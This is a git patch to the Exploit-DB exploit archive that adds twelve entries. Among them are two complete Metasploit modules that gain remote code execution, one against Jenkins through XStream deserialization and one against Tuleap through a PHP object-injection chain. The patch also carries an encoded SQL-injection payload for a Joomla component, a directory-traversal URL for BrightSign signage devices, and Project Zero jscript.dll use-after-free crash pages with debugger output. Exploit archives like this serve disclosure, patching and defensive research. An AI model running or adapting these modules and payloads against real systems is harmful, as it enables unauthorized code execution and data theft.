From f93f05e46f2e60ada41baf74e0ea554c5d15b91a Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 20 Dec 2017 05:02:22 +0000
Subject: [PATCH] DB: 2017-12-20

12 changes to exploits/shellcodes

Microsoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free
Microsoft Internet Explorer 11 - 'jscript!JSONStringifyObject' Use-After-Free
Microsoft Windows - 'jscript!RegExpComp::Compile' Heap Overflow Through IE or Local Network via WPAD
Microsoft Windows - jscript.dll 'Array.sort' Heap Overflow
Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable
Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read
Intel Content Protection HECI Service - Type Confusion Privilege Escalation

TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)
Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)
Jenkins - XStream Groovy classpath Deserialization (Metasploit)
BrightSign Digital Signage - Multiple Vulnerablities
Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection
---
 exploits/hardware/webapps/43364.txt |  40 ++++++
 exploits/multiple/remote/43375.rb   | 141 +++++++++++++++++++++
 exploits/php/remote/43374.rb        | 184 +++++++++++++++++++++++++++
 exploits/php/webapps/43365.txt      |  27 ++++
 exploits/windows/dos/43367.html     | 186 ++++++++++++++++++++++++++++
 exploits/windows/dos/43368.html     | 140 +++++++++++++++++++++
 exploits/windows/dos/43369.html     | 150 ++++++++++++++++++++++
 exploits/windows/dos/43370.html     | 117 +++++++++++++++++
 exploits/windows/dos/43371.html     | 138 +++++++++++++++++++++
 exploits/windows/dos/43372.html     |  91 ++++++++++++++
 exploits/windows/dos/43373.txt      |  93 ++++++++++++++
 exploits/windows/local/43366.md     |  34 +++++
 files_exploits.csv                  |  12 ++
 13 files changed, 1353 insertions(+)
 create mode 100644 exploits/hardware/webapps/43364.txt
 create mode 100755 exploits/multiple/remote/43375.rb
 create mode 100755 exploits/php/remote/43374.rb
 create mode 100644 exploits/php/webapps/43365.txt
 create mode 100644 exploits/windows/dos/43367.html
 create mode 100644 exploits/windows/dos/43368.html
 create mode 100644 exploits/windows/dos/43369.html
 create mode 100644 exploits/windows/dos/43370.html
 create mode 100644 exploits/windows/dos/43371.html
 create mode 100644 exploits/windows/dos/43372.html
 create mode 100644 exploits/windows/dos/43373.txt
 create mode 100644 exploits/windows/local/43366.md

diff --git a/exploits/hardware/webapps/43364.txt b/exploits/hardware/webapps/43364.txt
new file mode 100644
index 000000000..c746375c3
--- /dev/null
+++ b/exploits/hardware/webapps/43364.txt
@@ -0,0 +1,40 @@
+# Exploit Title: BrightSign Digital Signage (Multiple Vulnerabilities)
+# Date: 12/15/17
+# Exploit Author: singularitysec@gmail.com
+# Vectors: XSS, Directory Traversal, File Modification, Information Leakage
+
+
+The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below)
+suffers from multiple vulnerabilities.
+
+The pages:
+
+/network_diagnostics.html
+/storage_info.html
+
+Suffer from a Cross-Site Scripting vulnerability. The REF parameter for
+these pages do not sanitize user input, resulting in arbitrary execution,
+token theft and related attacks.
+
+
+
+The RP parameter in STORAGE.HTML suffers from a directory
+traversal/information leakage weakness:
+/storage.html?rp=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc
+
+Through parameter manipulation, the file system can be traversed,
+unauthenticated, allowing for leakage of information and compromise of the
+device.
+
+This page also allows for unauthenticated upload of files.
+
+/tools.html
+
+Page allows for unauthenticated rename/manipulation of files.
+
+When combined, these vulnerabilities allow for compromise of both end users
+and the device itself.
+
+Ex. A malicious attacker can upload a malicious page of their choosing and
+steal credentials, host malicious content or distribute content through the
+device, which accepts large format SD cards.
\ No newline at end of file
diff --git a/exploits/multiple/remote/43375.rb b/exploits/multiple/remote/43375.rb
new file mode 100755
index 000000000..2b02230d9
--- /dev/null
+++ b/exploits/multiple/remote/43375.rb
@@ -0,0 +1,141 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Jenkins XStream Groovy classpath Deserialization Vulnerability',
+      'Description'    => %q{
+        This module exploits CVE-2016-0792 a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions
+        older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath,
+        which allows remote arbitrary code execution. The issue affects default installations. Authentication
+        is not required to exploit the vulnerability.
+      },
+      'Author'         =>
+          [
+            'Arshan Dabirsiaghi', 			# Vulnerability discovery
+            'Matt Byrne <attackdebris[at]gmail.com>'    # Metasploit module
+          ],
+      'DisclosureDate' => 'Feb 24 2016',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+          [
+            ['CVE', '2016-0792'],
+            ['URL', 'https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'],
+            ['URL', 'https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413']
+          ],
+        'Platform'  => %w{ win linux unix },
+        'Arch'           => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],
+        'Targets'        => [
+        ['Unix (In-Memory)',
+          'Platform'   => 'unix',
+          'Arch'       => ARCH_CMD
+        ],
+        ['Python (In-Memory)',
+          'Platform'   => 'python',
+          'Arch'       => ARCH_PYTHON
+        ],
+        ['Linux (Dropper)',
+          'Platform'   => 'linux',
+          'Arch'       => [ARCH_X86, ARCH_X64]
+        ],
+        ['Windows (Dropper)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_X86, ARCH_X64]
+        ]
+      ],
+      'DefaultTarget' => 0
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
+      Opt::RPORT('8080')
+    ])
+    deregister_options('URIPATH')
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'The connection timed out.')
+    end
+
+    http_headers = res.headers
+
+    if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f < 1.650
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    case target.name
+    when /Unix/, /Python/
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager
+    end
+  end
+
+  # Exploit methods
+
+  def execute_command(cmd, opts = {})
+    cmd = case target.name
+    when /Unix/, /Linux/
+      %W{/bin/sh -c #{cmd}}
+    when /Python/
+      %W{python -c #{cmd}}
+    when /Windows/
+      %W{cmd.exe /c #{cmd}}
+    end
+
+    # Encode each command argument with XML entities
+    cmd.map! { |arg| arg.encode(xml: :text) }
+
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '/createItem'),
+      'vars_get' => { 'name' => 'random' },
+      'ctype'    => 'application/xml',
+      'data'     => xstream_payload(cmd)
+    )
+  end
+
+  def xstream_payload(cmd)
+    <<EOF
+<map>
+  <entry>
+    <groovy.util.Expando>
+      <expandoProperties>
+        <entry>
+          <string>hashCode</string>
+          <org.codehaus.groovy.runtime.MethodClosure>
+            <delegate class="groovy.util.Expando"/>
+            <owner class="java.lang.ProcessBuilder">
+              <command>
+                <string>#{cmd.join('</string><string>')}</string>
+              </command>
+            </owner>
+            <method>start</method>
+          </org.codehaus.groovy.runtime.MethodClosure>
+        </entry>
+      </expandoProperties>
+    </groovy.util.Expando>
+    <int>1</int>
+  </entry>
+</map>
+EOF
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/43374.rb b/exploits/php/remote/43374.rb
new file mode 100755
index 000000000..42bfe6616
--- /dev/null
+++ b/exploits/php/remote/43374.rb
@@ -0,0 +1,184 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Tuleap 9.6 Second-Order PHP Object Injection',
+      'Description'    => %q{
+        This module exploits a Second-Order PHP Object Injection vulnerability in Tuleap <= 9.6 which
+        could be abused by authenticated users to execute arbitrary PHP code with the permissions of the
+        webserver. The vulnerability exists because of the User::getRecentElements() method is using the
+        unserialize() function with data that can be arbitrarily manipulated by a user through the REST
+        API interface. The exploit's POP chain abuses the __toString() method from the Mustache class
+        to reach a call to eval() in the Transition_PostActionSubFactory::fetchPostActions() method.
+      },
+      'Author'         => 'EgiX',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://karmainsecurity.com/KIS-2017-02'],
+          ['URL', 'https://tuleap.net/plugins/tracker/?aid=10118'],
+          ['CVE', '2017-7411']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [ ['Tuleap <= 9.6', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Oct 23 2017'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, "The base path to the web application", "/"]),
+          OptString.new('USERNAME', [true, "The username to authenticate with" ]),
+          OptString.new('PASSWORD', [true, "The password to authenticate with" ]),
+          OptInt.new('AID', [ false, "The Artifact ID you have access to", "1"]),
+          Opt::RPORT(443)
+        ])
+  end
+
+  def setup_popchain(random_param)
+    print_status("Trying to login through the REST API...")
+
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'api/tokens'),
+      'ctype'     => 'application/json',
+      'data'      => {'username' => user, 'password' => pass}.to_json
+    })
+
+    unless res && (res.code == 201 || res.code == 200) && res.body
+      msg = "Login failed with #{user}:#{pass}"
+      print_error(msg) if @is_check
+      fail_with(Failure::NoAccess, msg)
+    end
+
+    body  = JSON.parse(res.body)
+    uid   = body['user_id']
+    token = body['token']
+
+    print_good("Login successful with #{user}:#{pass}")
+    print_status("Updating user preference with POP chain string...")
+
+    php_code = "null;eval(base64_decode($_POST['#{random_param}']));//"
+
+    pop_chain =  'a:1:{i:0;a:1:{'
+    pop_chain << 's:2:"id";O:8:"Mustache":2:{'
+    pop_chain << 'S:12:"\00*\00_template";'
+    pop_chain << 's:42:"{{#fetchPostActions}}{{/fetchPostActions}}";'
+    pop_chain << 'S:11:"\00*\00_context";a:1:{'
+    pop_chain << 'i:0;O:34:"Transition_PostAction_FieldFactory":1:{'
+    pop_chain << 'S:23:"\00*\00post_actions_classes";a:1:{'
+    pop_chain << "i:0;s:#{php_code.length}:\"#{php_code}\";}}}}}}"
+
+    pref = {'id' => uid, 'preference' => {'key' => 'recent_elements', 'value' => pop_chain}}
+
+    res = send_request_cgi({
+      'method'    => 'PATCH',
+      'uri'       => normalize_uri(target_uri.path, "api/users/#{uid}/preferences"),
+      'ctype'     => 'application/json',
+      'headers'   => {'X-Auth-Token' => token, 'X-Auth-UserId' => uid},
+      'data'      => pref.to_json
+    })
+
+    unless res && res.code == 200
+      msg = "Something went wrong"
+      print_error(msg) if @is_check
+      fail_with(Failure::UnexpectedReply, msg)
+    end
+  end
+
+  def do_login
+    print_status("Retrieving the CSRF token for login...")
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'account/login.php')
+    })
+
+    if res && res.code == 200 && res.body && res.get_cookies
+      if res.body =~ /name="challenge" value="(\w+)">/
+        csrf_token = $1
+        print_good("CSRF token: #{csrf_token}")
+      else
+        print_warning("CSRF token not found. Trying to login without it...")
+      end
+    else
+      msg = "Failed to retrieve the login page"
+      print_error(msg) if @is_check
+      fail_with(Failure::NoAccess, msg)
+    end
+
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'cookie'    => res.get_cookies,
+      'uri'       => normalize_uri(target_uri.path, 'account/login.php'),
+      'vars_post' => {'form_loginname' => user, 'form_pw' => pass, 'challenge' => csrf_token}
+    })
+
+    unless res && res.code == 302
+      msg = "Login failed with #{user}:#{pass}"
+      print_error(msg) if @is_check
+      fail_with(Failure::NoAccess, msg)
+    end
+
+    print_good("Login successful with #{user}:#{pass}")
+    res.get_cookies
+  end
+
+  def exec_php(php_code)
+    random_param = rand_text_alpha(10)
+
+    setup_popchain(random_param)
+    session_cookies = do_login()
+
+    print_status("Triggering the POP chain...")
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, "plugins/tracker/?aid=#{datastore['AID']}"),
+      'cookie'    => session_cookies,
+      'vars_post' => {random_param => Rex::Text.encode_base64(php_code)}
+    })
+
+    if res && res.code == 200 && res.body =~ /Exiting with Error/
+      msg = "No access to Artifact ID #{datastore['AID']}"
+      @is_check ? print_error(msg) : fail_with(Failure::NoAccess, msg)
+    end
+
+    res
+  end
+
+  def check
+    @is_check = true
+    flag = rand_text_alpha(rand(10)+20)
+    res  = exec_php("print '#{flag}';")
+
+    if res && res.code == 200 && res.body =~ /#{flag}/
+      return Exploit::CheckCode::Vulnerable
+    elsif res && res.body =~ /Exiting with Error/
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    @is_check = false
+    exec_php(payload.encoded)
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/43365.txt b/exploits/php/webapps/43365.txt
new file mode 100644
index 000000000..9086c7324
--- /dev/null
+++ b/exploits/php/webapps/43365.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection
+# Dork: N/A
+# Date: 19.12.2017
+# Vendor Homepage: hhttp://nextgeneditor.com/
+# Software Link: https://extensions.joomla.org/extension/nextgen-editor/
+# Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free
+# Version: 2.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL]
+#  
+# %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d
+# 
+# # # # #
\ No newline at end of file
diff --git a/exploits/windows/dos/43367.html b/exploits/windows/dos/43367.html
new file mode 100644
index 000000000..8ab9093a9
--- /dev/null
+++ b/exploits/windows/dos/43367.html
@@ -0,0 +1,186 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1376
+
+There is a use-after-free vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
+
+ - An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
+
+ - The issue can also be exploited by opening a malicious web page in Internet Explorer.
+
+The issue has been verified on 64-bit Win7 with the most recent patches applied.
+
+PoC for Internet Explorer (might require page heap to trigger the crash):
+
+============================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+
+var vars = new Array(100);
+for(var i=0;i<100;i++) vars[i] = {};
+
+function f() {
+  vars[1] = 1;
+  CollectGarbage();
+  return {};
+}
+
+vars[1].toString = f;
+Array.prototype.join.call(vars);
+
+</script>
+
+<!--
+============================================
+
+PoC for WPAD (might require page heap to trigger the crash):
+
+============================================
+
+function FindProxyForURL(url, host) {
+
+var vars = new Array(100);
+for(var i=0;i<100;i++) vars[i] = {};
+
+function f() {
+  vars[1] = 1;
+  CollectGarbage();
+  return {};
+}
+
+vars[1].toString = f;
+Array.prototype.join.call(vars);
+
+return "DIRECT";
+}
+
+===========================================
+
+Technical details:
+
+The issue is in NameTbl::GetValDef which is called when an object is converted to a string. The function attempts to call toString() or valueOf() of the NameTbl object 2 times or until the return value isn't an JavaScript object. The issue is that the NameTbl object on which these methods are called isn't explicitly tracked by the garbage collector, which means the object can be deleted inside the toString/valueOf callback (as long as it's not tracked by the garbage collector somewhere else). Basically, toString/valueOf can delete its 'this' object.
+
+Note that the crash location in the Debug log immediately precedes a virtual method call.
+
+Debug log (from IE, but it looks similar in the WPAD service):
+
+============================================
+
+(a68.e4c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+jscript!NameTbl::GetValDef+0x58:
+000007fe`f5dea398 498b06          mov     rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
+
+0:013> r
+rax=0000000000000001 rbx=000007fef5d7bd50 rcx=00000000044acfa0
+rdx=0000000000000000 rsi=0000000012b49fb8 rdi=0000000000000001
+rip=000007fef5dea398 rsp=0000000012b49ae0 rbp=0000000000000000
+ r8=0000000004309f20  r9=0000000004309670 r10=0000000000000081
+r11=0000000012b49a60 r12=0000000000000080 r13=0000000000000008
+r14=00000000044d9f90 r15=0000000000000000
+iopl=0         nv up ei ng nz ac po cy
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010297
+jscript!NameTbl::GetValDef+0x58:
+000007fe`f5dea398 498b06          mov     rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
+
+0:013> k
+ # Child-SP          RetAddr           Call Site
+00 00000000`12b49ae0 000007fe`f5dad069 jscript!NameTbl::GetValDef+0x58
+01 00000000`12b49b70 000007fe`f5d7de69 jscript!NameTbl::InvokeInternal+0xb07
+02 00000000`12b49c90 000007fe`f5d7bf3b jscript!VAR::GetValue+0xa1
+03 00000000`12b49ce0 000007fe`f5ddb65d jscript!ConvertToString+0x5b
+04 00000000`12b49f60 000007fe`f5d7c2ec jscript!JsArrayJoin+0x38d
+05 00000000`12b4a060 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
+06 00000000`12b4a110 000007fe`f5d786ea jscript!NameTbl::InvokeInternal+0x3f8
+07 00000000`12b4a230 000007fe`f5dcdd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
+08 00000000`12b4a280 000007fe`f5d7c2ec jscript!JsFncCall+0xc2
+09 00000000`12b4a310 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
+0a 00000000`12b4a3c0 000007fe`f5d7b234 jscript!NameTbl::InvokeInternal+0x3f8
+0b 00000000`12b4a4e0 000007fe`f5d79852 jscript!VAR::InvokeByName+0x81c
+0c 00000000`12b4a6f0 000007fe`f5d79929 jscript!VAR::InvokeDispName+0x72
+0d 00000000`12b4a770 000007fe`f5d724b8 jscript!VAR::InvokeByDispID+0x1229
+0e 00000000`12b4a7c0 000007fe`f5d78ec2 jscript!CScriptRuntime::Run+0x5a6
+0f 00000000`12b4b5c0 000007fe`f5d78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
+10 00000000`12b4b7d0 000007fe`f5d78b95 jscript!ScrFncObj::Call+0xb7
+11 00000000`12b4b870 000007fe`f5d7e6c0 jscript!CSession::Execute+0x19e
+12 00000000`12b4b940 000007fe`f5d870e7 jscript!COleScript::ExecutePendingScripts+0x17a
+13 00000000`12b4ba10 000007fe`f5d868d6 jscript!COleScript::ParseScriptTextCore+0x267
+14 00000000`12b4bb00 000007fe`ead55251 jscript!COleScript::ParseScriptText+0x56
+15 00000000`12b4bb60 000007fe`eb4db320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
+16 00000000`12b4bbe0 000007fe`ead56256 MSHTML!CScriptCollection::ParseScriptText+0x37f
+17 00000000`12b4bcc0 000007fe`ead55c8e MSHTML!CScriptData::CommitCode+0x3d9
+18 00000000`12b4be90 000007fe`ead55a11 MSHTML!CScriptData::Execute+0x283
+19 00000000`12b4bf50 000007fe`eb5146fb MSHTML!CHtmScriptParseCtx::Execute+0x101
+1a 00000000`12b4bf90 000007fe`eadf8a5b MSHTML!CHtmParseBase::Execute+0x235
+1b 00000000`12b4c030 000007fe`eacd2e39 MSHTML!CHtmPost::Broadcast+0x90
+1c 00000000`12b4c070 000007fe`ead2caef MSHTML!CHtmPost::Exec+0x4bb
+1d 00000000`12b4c280 000007fe`ead2ca40 MSHTML!CHtmPost::Run+0x3f
+1e 00000000`12b4c2b0 000007fe`ead2da12 MSHTML!PostManExecute+0x70
+1f 00000000`12b4c330 000007fe`ead30843 MSHTML!PostManResume+0xa1
+20 00000000`12b4c370 000007fe`ead16fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
+21 00000000`12b4c3c0 000007fe`eb544f78 MSHTML!CDwnChan::OnMethodCall+0x41
+22 00000000`12b4c3f0 000007fe`eac39d75 MSHTML!GlobalWndOnMethodCall+0x240
+23 00000000`12b4c490 00000000`77709bbd MSHTML!GlobalWndProc+0x150
+24 00000000`12b4c510 00000000`777098c2 USER32!UserCallWinProcCheckWow+0x1ad
+25 00000000`12b4c5d0 000007fe`f2be4a87 USER32!DispatchMessageWorker+0x3b5
+26 00000000`12b4c650 000007fe`f2bebabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
+27 00000000`12b4f8d0 000007fe`fe88572f IEFRAME!LCIETab_ThreadProc+0x3a3
+28 00000000`12b4fa00 000007fe`f5ff925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
+29 00000000`12b4fa30 00000000`775e59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
+2a 00000000`12b4fa80 00000000`7781a561 kernel32!BaseThreadInitThunk+0xd
+2b 00000000`12b4fab0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
+
+0:013> !heap -p -a 00000000`044d9f90
+    address 00000000044d9f90 found in
+    _DPH_HEAP_ROOT @ 3fd1000
+    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
+                                    3fe0680:          44d9000             2000
+    000007fef5f78726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
+    00000000778b4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
+    000000007785797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
+    000007feff2110c8 msvcrt!free+0x000000000000001c
+    000007fef5d7bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
+    000007fef5d7b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
+    000007fef5d942cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
+    000007fef5d719e2 jscript!GcContext::Reclaim+0x00000000000000ae
+    000007fef5d81956 jscript!GcContext::CollectCore+0x000000000000018b
+    000007fef5d817a5 jscript!GcContext::Collect+0x0000000000000025
+    000007fef5dc42f3 jscript!JsCollectGarbage+0x0000000000000023
+    000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
+    000007fef5d7c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
+    000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
+    000007fef5d724b8 jscript!CScriptRuntime::Run+0x00000000000005a6
+    000007fef5d78ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
+    000007fef5d78d2b jscript!ScrFncObj::Call+0x00000000000000b7
+    000007fef5da2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
+    000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
+    000007fef5dea422 jscript!NameTbl::GetValDef+0x00000000000000e2
+    000007fef5dad069 jscript!NameTbl::InvokeInternal+0x0000000000000b07
+    000007fef5d7de69 jscript!VAR::GetValue+0x00000000000000a1
+    000007fef5d7bf3b jscript!ConvertToString+0x000000000000005b
+    000007fef5ddb65d jscript!JsArrayJoin+0x000000000000038d
+    000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
+    000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
+    000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
+    000007fef5dcdd72 jscript!JsFncCall+0x00000000000000c2
+    000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
+    000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
+    000007fef5d7b234 jscript!VAR::InvokeByName+0x000000000000081c
+    000007fef5d79852 jscript!VAR::InvokeDispName+0x0000000000000072
+
+0:013> u rip
+jscript!NameTbl::GetValDef+0x58:
+000007fe`f5dea398 498b06          mov     rax,qword ptr [r14]
+000007fe`f5dea39b 488b98e0000000  mov     rbx,qword ptr [rax+0E0h]
+000007fe`f5dea3a2 488bcb          mov     rcx,rbx
+000007fe`f5dea3a5 ff15b5320400    call    qword ptr [jscript!_guard_check_icall_fptr (000007fe`f5e2d660)]
+000007fe`f5dea3ab 488b54fc40      mov     rdx,qword ptr [rsp+rdi*8+40h]
+000007fe`f5dea3b0 4c8d442450      lea     r8,[rsp+50h]
+000007fe`f5dea3b5 498bce          mov     rcx,r14
+000007fe`f5dea3b8 ffd3            call    rbx
+
+============================================
+-->
\ No newline at end of file
diff --git a/exploits/windows/dos/43368.html b/exploits/windows/dos/43368.html
new file mode 100644
index 000000000..210e602dd
--- /dev/null
+++ b/exploits/windows/dos/43368.html
@@ -0,0 +1,140 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1381
+
+There is a use-after-free in jscript.dll library that can be exploited in IE11.
+
+PoC:
+
+=========================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+
+var o1 = {toJSON:function(){
+  alert('o1');
+  return [o2];
+}}
+
+var o2 = {toJSON:function(){
+  alert('o2');
+  CollectGarbage();
+  return 'x';
+}}
+
+JSON.stringify(o1);
+
+</script>
+
+<!--
+=========================================
+
+Technical details: 
+
+JSONStringifyObject first calls JSONApplyFilters which calls an argument's toString method. However the return value of the toString method won't be on the garbage collector's root object list and thus can be freed during subsequent callbacks.
+
+Debug log:
+
+=========================================
+
+0:028> g
+(df8.e48): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+jscript!JSONStringifyArray+0x38f:
+000007fe`edbf9fb3 66214738        and     word ptr [rdi+38h],ax ds:00000000`04518fc8=????
+
+0:014> r
+rax=000000000000fffb rbx=0000000000000000 rcx=0000000000000005
+rdx=0000000000000005 rsi=00000000129ca100 rdi=0000000004518f90
+rip=000007feedbf9fb3 rsp=00000000129c9f30 rbp=00000000129c9fa9
+ r8=0000000000000000  r9=000000000405d670 r10=0000000000000081
+r11=00000000129c9f00 r12=0000000000000001 r13=0000000000000001
+r14=0000000000000000 r15=00000000129ca1a8
+iopl=0         nv up ei pl nz na pe nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+jscript!JSONStringifyArray+0x38f:
+000007fe`edbf9fb3 66214738        and     word ptr [rdi+38h],ax ds:00000000`04518fc8=????
+
+0:014> k
+ # Child-SP          RetAddr           Call Site
+00 00000000`129c9f30 000007fe`edbfa2cc jscript!JSONStringifyArray+0x38f
+01 00000000`129ca000 000007fe`edbfec94 jscript!JSONStringifyObject+0x2dc
+02 00000000`129ca0b0 000007fe`edb9c2ec jscript!JsJSONStringify+0x3e4
+03 00000000`129ca190 000007fe`edb9a9fe jscript!NatFncObj::Call+0x138
+04 00000000`129ca240 000007fe`edb9b234 jscript!NameTbl::InvokeInternal+0x3f8
+05 00000000`129ca360 000007fe`edb99852 jscript!VAR::InvokeByName+0x81c
+06 00000000`129ca570 000007fe`edb99929 jscript!VAR::InvokeDispName+0x72
+07 00000000`129ca5f0 000007fe`edb924b8 jscript!VAR::InvokeByDispID+0x1229
+08 00000000`129ca640 000007fe`edb98ec2 jscript!CScriptRuntime::Run+0x5a6
+09 00000000`129cb440 000007fe`edb98d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
+0a 00000000`129cb650 000007fe`edb98b95 jscript!ScrFncObj::Call+0xb7
+0b 00000000`129cb6f0 000007fe`edb9e6c0 jscript!CSession::Execute+0x19e
+0c 00000000`129cb7c0 000007fe`edba70e7 jscript!COleScript::ExecutePendingScripts+0x17a
+0d 00000000`129cb890 000007fe`edba68d6 jscript!COleScript::ParseScriptTextCore+0x267
+0e 00000000`129cb980 000007fe`ee2f5251 jscript!COleScript::ParseScriptText+0x56
+0f 00000000`129cb9e0 000007fe`eea7b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
+10 00000000`129cba60 000007fe`ee2f6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
+11 00000000`129cbb40 000007fe`ee2f5c8e MSHTML!CScriptData::CommitCode+0x3d9
+12 00000000`129cbd10 000007fe`ee2f5a11 MSHTML!CScriptData::Execute+0x283
